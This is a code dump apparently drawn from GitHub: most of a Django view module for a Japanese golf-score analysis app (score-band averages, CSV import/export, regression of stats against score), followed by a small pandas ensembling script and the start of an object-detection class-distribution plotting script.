round(male_90.mean()[\"par_on\"], 1)\n male_ob_90 = round(male_90.mean()[\"ob\"], 1)\n male_bunker_90 = round(male_90.mean()[\"bunker\"], 1)\n male_penalty_90 = round(male_90.mean()[\"penalty\"], 1)\n\n #男性100平均\n male_score_100 = round(male_100.mean()[\"total_score\"], 1)\n male_putt_100 = round(male_100.mean()[\"putt\"], 1)\n male_fw_100 = round(male_100.mean()[\"fw\"], 1)\n male_par_on_100 = round(male_100.mean()[\"par_on\"], 1)\n male_ob_100 = round(male_100.mean()[\"ob\"], 1)\n male_bunker_100 = round(male_100.mean()[\"bunker\"], 1)\n male_penalty_100 = round(male_100.mean()[\"penalty\"], 1)\n\n #男性110平均\n male_score_110 = round(male_110.mean()[\"total_score\"], 1)\n male_putt_110 = round(male_110.mean()[\"putt\"], 1)\n male_fw_110 = round(male_110.mean()[\"fw\"], 1)\n male_par_on_110 = round(male_110.mean()[\"par_on\"], 1)\n male_ob_110 = round(male_110.mean()[\"ob\"], 1)\n male_bunker_110 = round(male_110.mean()[\"bunker\"], 1)\n male_penalty_110 = round(male_110.mean()[\"penalty\"], 1)\n\n #男性120平均\n male_score_120 = round(male_120.mean()[\"total_score\"], 1)\n male_putt_120 = round(male_120.mean()[\"putt\"], 1)\n male_fw_120 = round(male_120.mean()[\"fw\"], 1)\n male_par_on_120 = round(male_120.mean()[\"par_on\"], 1)\n male_ob_120 = round(male_120.mean()[\"ob\"], 1)\n male_bunker_120 = round(male_120.mean()[\"bunker\"], 1)\n male_penalty_120 = round(male_120.mean()[\"penalty\"], 1)\n\n\n #男性平均cxt\n if f'{male_score_avgs}' != \"nan\":\n context[\"male_score_avgs\"] = f'{male_score_avgs}'\n 
context[\"male_putt_avgs\"] = f'{male_putt_avgs}'\n context[\"male_fw_avgs\"] = f'{male_fw_avgs}'+\"%\"\n context[\"male_par_on_avgs\"] = f'{male_par_on_avgs}'+\"%\"\n context[\"male_ob_avgs\"] = f'{male_ob_avgs}'+\"回\"\n context[\"male_bunker_avgs\"] = f'{male_bunker_avgs}'+\"回\"\n context[\"male_penalty_avgs\"] = f'{male_penalty_avgs}'+\"回\"\n \n #男性60平均cxtf'{}'+\"\"\n if f'{male_score_60}' != \"nan\":\n context[\"male_score_60\"] = male_score_60\n context[\"male_putt_60\"] = f'{male_putt_60}'\n context[\"male_fw_60\"] = f'{male_fw_60}'+\"%\"\n context[\"male_par_on_60\"] = f'{male_par_on_60}'+\"%\"\n context[\"male_ob_60\"] = f'{male_ob_60}'+\"回\"\n context[\"male_bunker_60\"] = f'{male_bunker_60}'+\"回\"\n context[\"male_penalty_60\"] = f'{male_penalty_60}'+\"回\"\n\n #男性70平均cxt\n if f'{male_score_70}' != \"nan\":\n context[\"male_score_70\"] = male_score_70\n context[\"male_putt_70\"] = f'{male_putt_70}'\n context[\"male_fw_70\"] = f'{male_fw_70}'+\"%\"\n context[\"male_par_on_70\"] = f'{male_par_on_70}'+\"%\"\n context[\"male_ob_70\"] = f'{male_ob_70}'+\"回\"\n context[\"male_bunker_70\"] = f'{male_bunker_70}'+\"回\"\n context[\"male_penalty_70\"] = f'{male_penalty_70}'+\"回\"\n\n #男性80平均cxt\n if f'{male_score_80}' != \"nan\":\n context[\"male_score_80\"] = male_score_80\n context[\"male_putt_80\"] = f'{male_putt_80}'\n context[\"male_fw_80\"] = f'{male_fw_80}'+\"%\"\n context[\"male_par_on_80\"] = f'{male_par_on_80}'+\"%\"\n context[\"male_ob_80\"] = f'{male_ob_80}'+\"回\"\n context[\"male_bunker_80\"] = f'{male_bunker_80}'+\"回\"\n context[\"male_penalty_80\"] = f'{male_penalty_80}'+\"回\"\n\n #男性90平均cxt\n if f'{male_score_90}' != \"nan\":\n context[\"male_score_90\"] = male_score_90\n context[\"male_putt_90\"] = f'{male_putt_90}'\n context[\"male_fw_90\"] = f'{male_fw_90}'+\"%\"\n context[\"male_par_on_90\"] = f'{male_par_on_90}'+\"%\"\n context[\"male_ob_90\"] = f'{male_ob_90}'+\"回\"\n context[\"male_bunker_90\"] = f'{male_bunker_90}'+\"回\"\n context[\"male_penalty_90\"] = f'{male_penalty_90}'+\"回\"\n \n #男性100平均cxt\n if f'{male_score_100}' != \"nan\":\n context[\"male_score_100\"] = male_score_100\n context[\"male_putt_100\"] = f'{male_putt_100}'\n context[\"male_fw_100\"] = f'{male_fw_100}'+\"%\"\n context[\"male_par_on_100\"] = f'{male_par_on_100}'+\"%\"\n context[\"male_ob_100\"] = f'{male_ob_100}'+\"回\"\n context[\"male_bunker_100\"] = f'{male_bunker_100}'+\"回\"\n context[\"male_penalty_100\"] = f'{male_penalty_100}'+\"回\"\n\n #男性110平均cxt\n if f'{male_score_110}' != \"nan\":\n context[\"male_score_110\"] = male_score_110\n context[\"male_putt_110\"] = f'{male_putt_110}'\n context[\"male_fw_110\"] = f'{male_fw_110}'+\"%\"\n context[\"male_par_on_110\"] = f'{male_par_on_110}'+\"%\"\n context[\"male_ob_110\"] = f'{male_ob_110}'+\"回\"\n context[\"male_bunker_110\"] = f'{male_bunker_110}'+\"回\"\n context[\"male_penalty_110\"] = f'{male_penalty_110}'+\"回\"\n\n #男性120平均cxt\n if f'{male_score_120}' != \"nan\":\n context[\"male_score_120\"] = male_score_120\n context[\"male_putt_120\"] = f'{male_putt_120}'\n context[\"male_fw_120\"] = f'{male_fw_120}'+\"%\"\n context[\"male_par_on_120\"] = f'{male_par_on_120}'+\"%\"\n context[\"male_ob_120\"] = f'{male_ob_120}'+\"回\"\n context[\"male_bunker_120\"] = f'{male_bunker_120}'+\"回\"\n context[\"male_penalty_120\"] = f'{male_penalty_120}'+\"回\"\n \n #女性↓\n\n if Stat.objects.filter(player__sex=\"女性\").values().exists() == True:\n\n #女性平均\n female_score_avgs = 
round(df_female[[\"player_id\",\"total_score\"]].groupby(\"player_id\").mean()[\"total_score\"].mean(), 1)\n female_putt_avgs = round(df_female[[\"player_id\",\"putt\"]].groupby(\"player_id\").mean()[\"putt\"].mean(), 1)\n female_fw_avgs = round(df_female[[\"player_id\",\"fw\"]].groupby(\"player_id\").mean()[\"fw\"].mean(), 1)\n female_par_on_avgs = round(df_female[[\"player_id\",\"par_on\"]].groupby(\"player_id\").mean()[\"par_on\"].mean(), 1)\n female_ob_avgs = round(df_female[[\"player_id\",\"ob\"]].groupby(\"player_id\").mean()[\"ob\"].mean(), 1)\n female_bunker_avgs = round(df_female[[\"player_id\",\"bunker\"]].groupby(\"player_id\").mean()[\"bunker\"].mean(), 1)\n female_penalty_avgs = round(df_female[[\"player_id\",\"penalty\"]].groupby(\"player_id\").mean()[\"penalty\"].mean(), 1)\n\n #女性それぞれの平均\n allfemale_score_avg = df_female[[\"player_id\",\"total_score\",\"ob\",\"penalty\",\"fw\",\"par_on\",\"putt\", \"bunker\"]].groupby(\"player_id\").mean()\n female_60 = allfemale_score_avg[allfemale_score_avg[\"total_score\"] < 70]\n female_70 = allfemale_score_avg[(allfemale_score_avg[\"total_score\"] >= 70) & (allfemale_score_avg[\"total_score\"] < 80)]\n female_80 = allfemale_score_avg[(allfemale_score_avg[\"total_score\"] >= 80) & (allfemale_score_avg[\"total_score\"] < 90)]\n female_90 = allfemale_score_avg[(allfemale_score_avg[\"total_score\"] >= 90) & (allfemale_score_avg[\"total_score\"] < 100)]\n female_100 = allfemale_score_avg[(allfemale_score_avg[\"total_score\"] >= 100) & (allfemale_score_avg[\"total_score\"] < 110)]\n female_110 = allfemale_score_avg[(allfemale_score_avg[\"total_score\"] >= 110) & (allfemale_score_avg[\"total_score\"] < 120)]\n female_120 = allfemale_score_avg[allfemale_score_avg[\"total_score\"] >= 120]\n\n #女性60平均\n female_score_60 = round(female_60.mean()[\"total_score\"], 1)\n female_putt_60 = round(female_60.mean()[\"putt\"], 1)\n female_fw_60 = round(female_60.mean()[\"fw\"], 1)\n female_par_on_60 = round(female_60.mean()[\"par_on\"], 1)\n female_ob_60 = round(female_60.mean()[\"ob\"], 1)\n female_bunker_60 = round(female_60.mean()[\"bunker\"], 1)\n female_penalty_60 = round(female_60.mean()[\"penalty\"], 1)\n\n #女性70平均\n female_score_70 = round(female_70.mean()[\"total_score\"], 1)\n female_putt_70 = round(female_70.mean()[\"putt\"], 1)\n female_fw_70 = round(female_70.mean()[\"fw\"], 1)\n female_par_on_70 = round(female_70.mean()[\"par_on\"], 1)\n female_ob_70 = round(female_70.mean()[\"ob\"], 1)\n female_bunker_70 = round(female_70.mean()[\"bunker\"], 1)\n female_penalty_70 = round(female_70.mean()[\"penalty\"], 1)\n\n #女性80平均\n female_score_80 = round(female_80.mean()[\"total_score\"], 1)\n female_putt_80 = round(female_80.mean()[\"putt\"], 1)\n female_fw_80 = round(female_80.mean()[\"fw\"], 1)\n female_par_on_80 = round(female_80.mean()[\"par_on\"], 1)\n female_ob_80 = round(female_80.mean()[\"ob\"], 1)\n female_bunker_80 = round(female_80.mean()[\"bunker\"], 1)\n female_penalty_80 = round(female_80.mean()[\"penalty\"], 1)\n \n #女性90平均\n female_score_90 = round(female_90.mean()[\"total_score\"], 1)\n female_putt_90 = round(female_90.mean()[\"putt\"], 1)\n female_fw_90 = round(female_90.mean()[\"fw\"], 1)\n female_par_on_90 = round(female_90.mean()[\"par_on\"], 1)\n female_ob_90 = round(female_90.mean()[\"ob\"], 1)\n female_bunker_90 = round(female_90.mean()[\"bunker\"], 1)\n female_penalty_90 = round(female_90.mean()[\"penalty\"], 1)\n\n #女性100平均\n female_score_100 = round(female_100.mean()[\"total_score\"], 1)\n female_putt_100 = 
round(female_100.mean()[\"putt\"], 1)\n female_fw_100 = round(female_100.mean()[\"fw\"], 1)\n female_par_on_100 = round(female_100.mean()[\"par_on\"], 1)\n female_ob_100 = round(female_100.mean()[\"ob\"], 1)\n female_bunker_100 = round(female_100.mean()[\"bunker\"], 1)\n female_penalty_100 = round(female_100.mean()[\"penalty\"], 1)\n\n #女性110平均\n female_score_110 = round(female_110.mean()[\"total_score\"], 1)\n female_putt_110 = round(female_110.mean()[\"putt\"], 1)\n female_fw_110 = round(female_110.mean()[\"fw\"], 1)\n female_par_on_110 = round(female_110.mean()[\"par_on\"], 1)\n female_ob_110 = round(female_110.mean()[\"ob\"], 1)\n female_bunker_110 = round(female_110.mean()[\"bunker\"], 1)\n female_penalty_110 = round(female_110.mean()[\"penalty\"], 1)\n\n #女性120平均\n female_score_120 = round(female_120.mean()[\"total_score\"], 1)\n female_putt_120 = round(female_120.mean()[\"putt\"], 1)\n female_fw_120 = round(female_120.mean()[\"fw\"], 1)\n female_par_on_120 = round(female_120.mean()[\"par_on\"], 1)\n female_ob_120 = round(female_120.mean()[\"ob\"], 1)\n female_bunker_120 = round(female_120.mean()[\"bunker\"], 1)\n female_penalty_120 = round(female_120.mean()[\"penalty\"], 1)\n\n\n #女性平均cxt\n if f'{female_score_avgs}' != \"nan\":\n context[\"female_score_avgs\"] = f'{female_score_avgs}'\n context[\"female_putt_avgs\"] = f'{female_putt_avgs}'\n context[\"female_fw_avgs\"] = f'{female_fw_avgs}'+\"%\"\n context[\"female_par_on_avgs\"] = f'{female_par_on_avgs}'+\"%\"\n context[\"female_ob_avgs\"] = f'{female_ob_avgs}'+\"回\"\n context[\"female_bunker_avgs\"] = f'{female_bunker_avgs}'+\"回\"\n context[\"female_penalty_avgs\"] = f'{female_penalty_avgs}'+\"回\"\n \n #女性60平均cxtf'{}'+\"\"\n if f'{female_score_60}' != \"nan\":\n context[\"female_score_60\"] = female_score_60\n context[\"female_putt_60\"] = f'{female_putt_60}'\n context[\"female_fw_60\"] = f'{female_fw_60}'+\"%\"\n context[\"female_par_on_60\"] = f'{female_par_on_60}'+\"%\"\n context[\"female_ob_60\"] = f'{female_ob_60}'+\"回\"\n context[\"female_bunker_60\"] = f'{female_bunker_60}'+\"回\"\n context[\"female_penalty_60\"] = f'{female_penalty_60}'+\"回\"\n\n #女性70平均cxt\n if f'{female_score_70}' != \"nan\":\n context[\"female_score_70\"] = female_score_70\n context[\"female_putt_70\"] = f'{female_putt_70}'\n context[\"female_fw_70\"] = f'{female_fw_70}'+\"%\"\n context[\"female_par_on_70\"] = f'{female_par_on_70}'+\"%\"\n context[\"female_ob_70\"] = f'{female_ob_70}'+\"回\"\n context[\"female_bunker_70\"] = f'{female_bunker_70}'+\"回\"\n context[\"female_penalty_70\"] = f'{female_penalty_70}'+\"回\"\n\n #女性80平均cxt\n if f'{female_score_80}' != \"nan\":\n context[\"female_score_80\"] = female_score_80\n context[\"female_putt_80\"] = f'{female_putt_80}'\n context[\"female_fw_80\"] = f'{female_fw_80}'+\"%\"\n context[\"female_par_on_80\"] = f'{female_par_on_80}'+\"%\"\n context[\"female_ob_80\"] = f'{female_ob_80}'+\"回\"\n context[\"female_bunker_80\"] = f'{female_bunker_80}'+\"回\"\n context[\"female_penalty_80\"] = f'{female_penalty_80}'+\"回\"\n\n #女性90平均cxt\n if f'{female_score_90}' != \"nan\":\n context[\"female_score_90\"] = female_score_90\n context[\"female_putt_90\"] = f'{female_putt_90}'\n context[\"female_fw_90\"] = f'{female_fw_90}'+\"%\"\n context[\"female_par_on_90\"] = f'{female_par_on_90}'+\"%\"\n context[\"female_ob_90\"] = f'{female_ob_90}'+\"回\"\n context[\"female_bunker_90\"] = f'{female_bunker_90}'+\"回\"\n context[\"female_penalty_90\"] = f'{female_penalty_90}'+\"回\"\n \n #女性100平均cxt\n if f'{female_score_100}' != \"nan\":\n 
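# reached only when at least one player's average score falls in the 100s band; an empty band gives NaN means and these keys stay unset\n                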
context[\"female_score_100\"] = female_score_100\n context[\"female_putt_100\"] = f'{female_putt_100}'\n context[\"female_fw_100\"] = f'{female_fw_100}'+\"%\"\n context[\"female_par_on_100\"] = f'{female_par_on_100}'+\"%\"\n context[\"female_ob_100\"] = f'{female_ob_100}'+\"回\"\n context[\"female_bunker_100\"] = f'{female_bunker_100}'+\"回\"\n context[\"female_penalty_100\"] = f'{female_penalty_100}'+\"回\"\n\n #女性110平均cxt\n if f'{female_score_110}' != \"nan\":\n context[\"female_score_110\"] = female_score_110\n context[\"female_putt_110\"] = f'{female_putt_110}'\n context[\"female_fw_110\"] = f'{female_fw_110}'+\"%\"\n context[\"female_par_on_110\"] = f'{female_par_on_110}'+\"%\"\n context[\"female_ob_110\"] = f'{female_ob_110}'+\"回\"\n context[\"female_bunker_110\"] = f'{female_bunker_110}'+\"回\"\n context[\"female_penalty_110\"] = f'{female_penalty_110}'+\"回\"\n\n #女性120平均cxt\n if f'{female_score_120}' != \"nan\":\n context[\"female_score_120\"] = female_score_120\n context[\"female_putt_120\"] = f'{female_putt_120}'\n context[\"female_fw_120\"] = f'{female_fw_120}'+\"%\"\n context[\"female_par_on_120\"] = f'{female_par_on_120}'+\"%\"\n context[\"female_ob_120\"] = f'{female_ob_120}'+\"回\"\n context[\"female_bunker_120\"] = f'{female_bunker_120}'+\"回\"\n context[\"female_penalty_120\"] = f'{female_penalty_120}'+\"回\"\n\n\n\n return context\n\n#csvインポート\nclass CsvImport(generic.FormView):\n template_name = 'score/csv_import.html'\n success_url = reverse_lazy('score:person_list')\n form_class = CSVUploadForm\n\n def form_valid(self, form):\n file_encoding = chardet.detect(form.cleaned_data['file'].read())['encoding']\n form.cleaned_data['file'].seek(0)\n\n # Check if the detected encoding is utf-8\n if file_encoding is not None and file_encoding.lower() == 'utf-8':\n # csv.readerに渡すため、TextIOWrapperでテキストモードなファイルに変換\n form_data = io.TextIOWrapper(form.cleaned_data['file'], encoding='utf-8')\n csv_file = csv.reader(form_data)\n # 1行ずつ取り出し、作成していく\n if form_data.name.endswith('.csv'):\n successful = True # 全てのデータを登録できたかどうかのフラグ\n for line in csv_file:\n try:\n #異なるログインユーザーであれば同じplayer_numberでも登録したいので、player_numberを工夫\n #読み込もうとしているプレイヤーが既に登録されていないかチェック\n if f'[{self.request.user.id}]' != list(Person.objects.values_list('login_user', flat=True).filter(player_number=int(f'{self.request.user.id}'+\"000000\"+f'{line[1]}'))):\n person, created = Person.objects.get_or_create(player_number=int(f'{self.request.user.id}'+\"000000\"+f'{line[1]}'))\n person.login_user = self.request.user.id\n person.name =line[0]\n person.age = line[2]\n person.sex = line[3]\n person.save()\n\n stat_number_check =list(Stat.objects.values(\"stat_number\").all())\n stat_number_check = f'{stat_number_check}'\n stat_number_check = stat_number_check.replace(\"}\", \"\")\n s_check = int(f'{self.request.user.id}'+\"000000\"+f'{line[12]}')\n #読み込もうとしているスタッツが既に登録されていないかチェック\n if f': {s_check},' not in f'{stat_number_check}' and f': {s_check}]' not in f'{stat_number_check}':\n \n Stat.objects.create(\n player = Person.objects.get(player_number=int(f'{self.request.user.id}'+\"000000\"f'{line[1]}')),\n stat_number = int(f'{self.request.user.id}'+\"000000\"+f'{line[12]}'),\n date = line[4],\n total_score = line[5],\n putt = line[6],\n fw = line[7],\n par_on = line[8],\n ob = line[9],\n bunker = line[10],\n penalty = line[11]\n )\n except:\n successful = False # データ登録に失敗した場合、フラグをFalseにする\n \n if successful:\n return super().form_valid(form)\n else:\n return redirect('score:person_list')\n return super().form_valid(form)\n \n else:\n 
messages.add_message(self.request, messages.ERROR, \"csvファイルを選択してください\")\n return redirect('score:csv_import')\n else:\n messages.add_message(self.request, messages.ERROR, \"文字コードがUTF-8のcsvファイルを選択してください。\")\n return redirect('score:csv_import')\n\n#csvエクスポート\ndef csv_export(request):\n #csvファイル作成\n response = HttpResponse(content_type='text/csv; charset=Shift-JIS')\n filename = urllib.parse.quote((u'stats_analyze.csv').encode(\"utf8\"))\n response['Content-Disposition'] = 'attachment; filename*=UTF-8\\'\\'{}'.format(filename)\n writer = csv.writer(response)\n #列名\n header = [\"名前\", \"影響度\", \"パット\",'FWキープ','パーオン','OB',\"バンカー\",'ペナルティ', \"stats平均\",\"スコア\",\"パット数\",\"FWキープ率\",\"パーオン率\",\"OB数\",\"バンカー数\",\"ペナルティ数\"]\n writer.writerow(header)\n login_user_id = request.user.id\n\n #StatAnalyzeクラスの計算式を使い回す方法が分からなかったため再度計算\n pks = list(Person.objects.values_list('id', flat=True).filter(login_user=login_user_id).order_by(\"sex\"))\n for pk in pks:\n\n if Stat.objects.filter(player=pk).all().exists() == True:\n\n df = pd.DataFrame(Stat.objects.filter(player_id=pk).values())\n df.columns = ['id', 'player_id', 'date', \"スコア\", 'パット','FWキープ','パーオン','OB','バンカー','ペナルティ','stat_number']\n\n if len(df) > 7:\n #全stat\n z = df.drop(['id','player_id','date','stat_number'], axis=1)\n\n score_count = len(z)-1\n putt_true_count = f'{z.duplicated(\"パット\")}'.count(\"True\")\n if putt_true_count == score_count:\n z.iat[1,1] = 101\n\n fw_true_count = f'{z.duplicated(\"FWキープ\")}'.count(\"True\")\n if fw_true_count == score_count:\n z.iat[1,2] = 101\n\n par_true_count = f'{z.duplicated(\"パーオン\")}'.count(\"True\")\n if par_true_count == score_count:\n z.iat[1,3] = 101\n \n ob_true_count = f'{z.duplicated(\"OB\")}'.count(\"True\")\n if ob_true_count == score_count:\n z.iat[1,4] = 101\n\n bunker_true_count = f'{z.duplicated(\"バンカー\")}'.count(\"True\")\n if bunker_true_count == score_count:\n z.iat[1,5] = 101\n\n penalty_true_count = f'{z.duplicated(\"ペナルティ\")}'.count(\"True\")\n if penalty_true_count == score_count:\n z.iat[1,6] = 101 \n\n #statを標準化\n df_std = z.apply(lambda x: (x-x.mean())/x.std(), axis=0)\n #statのスコア以外\n x = df_std.drop(['スコア'], axis=1)\n #スコア\n y = df_std['スコア']\n\n reg = LinearRegression()\n results = reg.fit(x,y)\n coef = reg.coef_.round(4)\n n = x.shape[0]\n p = x.shape[1]\n\n y_hat = reg.predict(x)\n sse = np.sum((y - y_hat) **2, axis=0)\n sse = sse / (n - p - 1)\n s = np.linalg.inv(np.dot(x.T, x))\n std_err = np.sqrt(np.diagonal(sse * s)).round(4)\n\n t_values = (coef / std_err).round(4)\n t_values_abs = np.abs(t_values)\n t_add = t_values_abs[0] + t_values_abs[1] + t_values_abs[2] + t_values_abs[3] + t_values_abs[4] + t_values_abs[5]\n x = 100 / t_add\n t_values_abs = (x * t_values_abs).round(1)\n \n col = [\"パット\",'FWキープ','パーオン','OB',\"バンカー\",'ペナルティ',]\n practice = dict(zip(col, t_values_abs))\n \n else:\n df_score = df.sort_values(\"スコア\")\n data_count = df[\"スコア\"].count()\n \n df_patt = df.sort_values(by=[\"パット\",\"スコア\"])\n patt_count = [abs(df_patt.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n patt_score = sum(patt_count)\n \n df_fk = df.sort_values(by=[\"FWキープ\",\"スコア\"], ascending=[False,True])\n fk_count = [abs(df_fk.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n fk_score = sum(fk_count)\n \n df_po = df.sort_values(by=[\"パーオン\",\"スコア\"], ascending=[False,True])\n po_count = [abs(df_po.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n po_score = sum(po_count)\n \n df_OB = 
df.sort_values(by=[\"OB\",\"スコア\"])\n OB_count = [abs(df_OB.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n OB_score = sum(OB_count)\n\n df_バンカー = df.sort_values(by=[\"バンカー\",\"スコア\"])\n バンカー_count = [abs(df_バンカー.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n バンカー_score = sum(バンカー_count)\n \n df_pn = df.sort_values(by=[\"ペナルティ\",\"スコア\"])\n pn_count = [abs(df_pn.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n pn_score = sum(pn_count) \n \n calc_add = 1/(OB_score+1) + 1/(pn_score+1) + 1/(fk_score+1) + 1/(po_score+1) + 1/(patt_score+1) + 1/(バンカー_score+1)\n cf = 100 / calc_add\n\n practice = {\"パット\": round(cf / (patt_score+1),1),\n \"FWキープ\": round(cf / (fk_score+1), 1),\n \"パーオン\": round(cf / (po_score+1), 1),\n \"OB\": round(cf / (OB_score+1), 1),\n \"バンカー\": round(cf / (バンカー_score+1),1),\n \"ペナルティ\": round(cf / (pn_score+1), 1)}\n \n score_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"total_score\"))\n putt_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"putt\")) \n fw_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"fw\")) \n par_on_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"par_on\")) \n ob_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"ob\"))\n bunker_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"bunker\"))\n penalty_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"penalty\"))\n\n blank = \"\"\n player_name = list(Person.objects.values_list(\"name\", flat=True).filter(id=pk))\n player_name = f'{player_name}'.replace(\"['\", \"\").replace(\"']\", \"\")\n\n writer.writerow([player_name,blank,practice[\"パット\"],practice[\"FWキープ\"],practice[\"パーオン\"],practice[\"OB\"],practice[\"バンカー\"],practice[\"ペナルティ\"],blank,\n round(score_avg[\"total_score__avg\"],1),\n round(putt_avg[\"putt__avg\"],1),\n round(fw_avg[\"fw__avg\"],1),\n round(par_on_avg[\"par_on__avg\"],1),\n round(ob_avg[\"ob__avg\"],1),\n round(bunker_avg[\"bunker__avg\"],1), \n round(penalty_avg[\"penalty__avg\"],1)])\n \n return response\n\n#csvフォーマット\ndef csv_format(request):\n response = HttpResponse(content_type='text/csv; charset=Shift-JIS')\n filename = urllib.parse.quote((u'score_teacher_csvフォーマット.csv').encode(\"utf8\"))\n response['Content-Disposition'] = 'attachment; filename*=UTF-8\\'\\'{}'.format(filename)\n writer = csv.writer(response)\n header = [\"プレイヤー名\",\"プレイヤーナンバー一人一つの番号をつけて下さい(重複不可)\",\"年齢\",\"性別(男性or女性)\",\"ラウンド日(例:2023-03-12)\",\"スコア\",\"パット数\",\"フェアウェイキープ率\",\"パーオン率\",\"OB数\",\"バンカー数\",\"ペナルティ数\",\"ラウンドナンバー一ラウンド一つの番号をつけて下さい(重複不可)\"]\n writer.writerow(header)\n\n return response\n\n","repo_name":"yoshiringo/ScoreTeacher","sub_path":"score/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":43773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70921665043","text":"import pandas as pd\n\ndef ensemble():\n\n\n\n ms = ['../lr/lr_test_l1.csv', '../rf/rf_test_l1.csv', '../svm/svm_test_l1.csv', '../xgb/xgb_test_l1.csv']\n ms = ['../lr/lr_test_l1.csv', '../xgb/xgb_test_l1.csv']\n\n\n test = []\n for m in ms:\n df = pd.read_csv(m)\n ID = df['ID']\n df = df.drop('ID', axis=1)\n col = df.columns\n test.append(df.values)\n \n df = sum(test)\n df = df/2.0\n df = pd.DataFrame(df, index=ID, columns=col)\n\n df.to_csv('submission.csv', index_label='ID')\n\n \n\ndef get_level_1():\n\n ms = ['../lr/lr_test_l1.csv', '../rf/rf_test_l1.csv', '../svm/svm_test_l1.csv', '../xgb/xgb_test_l1.csv']\n test = []\n for m in ms:\n df = 
pd.read_csv(m)\n        \n        df = df.drop('id', axis=1)\n        test.append(df.values)\n    return test\n    test = pd.concat(test, axis=1)\n    return test\n\n\n    test.to_csv('../../data/test_level_1.csv', index=False)\n\n\n\n\n\n    ms = ['../lr/lr_train_l1.csv', '../rf/rf_train_l1.csv', '../svm/svm_train_l1.csv', '../xgb/xgb_train_l1.csv']\n    train = []\n    for m in ms:\n        df = pd.read_csv(m)\n        train.append(df)\n    train = pd.concat(train, axis=1)\n    train.to_csv('../../data/train_level1.csv', index=False)\n\n    \n\n\n\nensemble()\n#df = get_level_1()\n","repo_name":"Harry040/kaggle_framework","sub_path":"models/ensemble/ensemble.py","file_name":"ensemble.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17673854781","text":"from inference_tool import InfTool\n\nfrom collections import Counter\nfrom collections import defaultdict\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport argparse\nimport cv2\nimport os\nimport glob\nimport pathlib\nimport torch.nn.functional as F\nimport torch\nimport json\n\nfrom scipy.stats import entropy\n\nfrom data.config import COCO_CLASSES\n\ndef parse_args(argv=None):\n    parser = argparse.ArgumentParser(\n        description='Visualisation of detections')\n    parser.add_argument('--detections_dir', default=\"\", type=str,\n                        help='Path to the file with detection results')\n    parser.add_argument('--plot_bars', default=0, type=int,\n                        help='Style of the visualisation')\n    parser.add_argument('--habitat_comparison', default=0, type=int,\n                        help='Whether to draw comparison real with Habitat')\n    args = parser.parse_args(argv)\n\n    return args\n\nif __name__ == '__main__':\n\n    args = parse_args()\n\n    with open(os.path.join(args.detections_dir,\"detections.json\"), 'r', encoding='utf-8') as f:\n        results = json.load(f)\n    if args.habitat_comparison:\n        with open(os.path.join(args.detections_dir + \"_habitat\",\"detections.json\"), 'r', encoding='utf-8') as f:\n            habitat_results = json.load(f)\n\n    smax_vectors = np.array(results[\"detections\"])\n\n    labels = [\"background\"]+list(COCO_CLASSES)\n\n    argmax = np.argmax(smax_vectors, axis=0)\n    num_wins = np.zeros((len(labels), len(argmax)))\n    num_wins[argmax, np.arange(len(argmax))] = 1\n    num_wins = np.sum(num_wins, 1)\n    num_wins_normed = num_wins / np.sum(num_wins)\n    num_wins_normed[num_wins_normed == 0] = np.nan\n\n    total_mean = np.mean(smax_vectors, 1)\n    print(smax_vectors.shape)\n    print(\"Total mean {}{}\".format(total_mean.shape, np.sum(total_mean)))\n    entr = entropy(total_mean.squeeze()) / np.log(len(total_mean))\n    max_class = np.argmax(total_mean) - 1\n    if max_class == -1:\n        final_class = \"background\"\n    else:\n        final_class = COCO_CLASSES[max_class]\n    print(\"Class: {}\".format(final_class))\n    print(\"Entropy: {}\".format(entr))\n    fig = plt.figure(figsize=(20,9))\n    plt.title(\"Class distribution plot for the object {}\".format(results[\"object_name\"]), pad=15, weight=\"bold\", size=25)\n    plt.xlabel('Class', labelpad=15, color='#333333', size=25)\n    plt.ylabel('Score', labelpad=15, color='#333333', size=25)\n    plt.xticks(rotation='vertical', size=15)\n    plt.margins(x=0.01)\n    plt.yticks(size=15)\n    plt.axhline(y=results[\"args\"][\"score_threshold\"], color='black', linestyle='--', label='Score threshold')\n    no_dets = (results[\"num_frames\"] - results[\"detected_frames\"])\n    no_dets_bck_wins_norm = (no_dets + num_wins[0]) / (results[\"num_frames\"] + np.sum(num_wins))\n    plt.scatter([\"nodet+bkgd\"], no_dets_bck_wins_norm,\n                
color='m', marker='o', edgecolors='black', s=100, label=\"Norm sum of nodets and bkgd wins\")\n plt.scatter([\"no detection\"], no_dets / results[\"num_frames\"],\n color='r', marker='o', edgecolors='black', s=100, label=\"Norm number of frames without dets\")\n if args.plot_bars:\n for i in range(smax_vectors.shape[1]):\n plt.bar(labels, smax_vectors[:, i], alpha=0.1, color=\"blue\")\n plt.bar(labels, total_mean, color=\"red\", label=\"Mean\", linewidth=4)\n else:\n for i in range(smax_vectors.shape[1]):\n plt.plot(labels, smax_vectors[:, i], alpha=0.1, color=\"blue\")\n plt.plot(labels, total_mean, color=\"red\", label=\"Mean\", linewidth=4)\n\n plt.scatter(labels, num_wins_normed, color='w', marker='o', edgecolors='black', s=100, zorder=1000, label=\"Norm number of wins\")\n #plt.subplots_adjust(bottom=0.2)\n\n plt.plot([], [], ' ', label=\"Number of frames: {}\".format(results[\"num_frames\"]))\n plt.plot([], [], ' ', label=\"Frames with detections: {}\".format(results[\"detected_frames\"]))\n plt.plot([], [], ' ', label=\"Number of detections {}\".format(smax_vectors.shape[1]))\n plt.plot([], [], ' ', label=\"Max mean class: {}\".format(final_class))\n plt.plot([], [], ' 